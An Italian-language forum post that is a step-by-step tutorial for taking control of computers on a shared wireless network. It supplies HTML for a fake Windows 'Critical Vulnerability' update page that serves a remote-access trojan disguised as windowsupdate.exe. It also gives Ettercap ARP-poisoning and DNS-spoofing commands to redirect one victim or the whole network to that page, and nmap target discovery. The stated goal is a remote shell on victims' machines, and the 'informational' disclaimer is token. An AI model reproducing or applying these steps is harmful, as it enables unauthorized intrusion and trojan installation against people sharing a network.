Hai craccato il wireless key ? e poi ?

Started by ultra_lazer, June 28, 2011, 10:05:22 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

ultra_lazer

June 28, 2011, 10:05:22 PM Last Edit: June 28, 2011, 10:13:27 PM by ultra_lazer
Certamente vorrete prendere controllo dei pc all'interno del network , o no?! ;)

Questo tutorial vi faro' vedere come si controllano i pc nello stesso network usando { Ettercap, Dns spoof , Apache server e un RAT ( remote admin tool) di vostra scelta }.

Su Backbox, navigate a /var/www/, troverete il file : index.html.
Backup qualsiasi cosa trovi in index.html, dopo rimpizzalo con questo codice:

<body>
<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
</p>
<p align="center" class="style2"></p>
<p>&nbsp;</p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4">&nbsp;</p>
</body>
</html>

Adesso copiate il vostro RAT in /var/www/ e nominatelo " windowsupdate.exe.

Start Apache server cosi :    /etc/init.d/apache2 start

Aprite firefox e mettete : 127.0.0.1 , la Fake update pagina dovrebbe comparire.

Ora configuriamo il Dns_spoofing cosi :  echo "* A 192.168.1.101" >> /usr/share/ettercap/etter.dns
* Cambiate l'ip con il vostro IP*

Ora dobbiamo trovare il target cosi:   nmap -sP your_subnet/24

Ora cominciamo il Dns_spoofing con Ettercap cosi:  ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof

* cambiate 192.168.1.102 con il target IP e 192.168.1.1 con il getaway e wlan0 con la vostra interface*

*** Se volete tutti i pc nel network allora cosi:  ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ // -P dns_spoof

Ora la vostra Fake Update page comparira' su il computer della tua vittima, anche se e' spspettoso prima o poi ci clicchera' sul Update perche non potra' fare altro! appena il RAT sara; attivato, avrete la sua CMD Chiudete subito Ettercap e emettete questo nel vostro terminal :   ipconfig /flushdns

Cosi la vittima torna online!


Mi rendo conto che e' un poco ortodosso , ma l'ho messo a scopo informativo. :D


Print
Go Up Pages1
User actions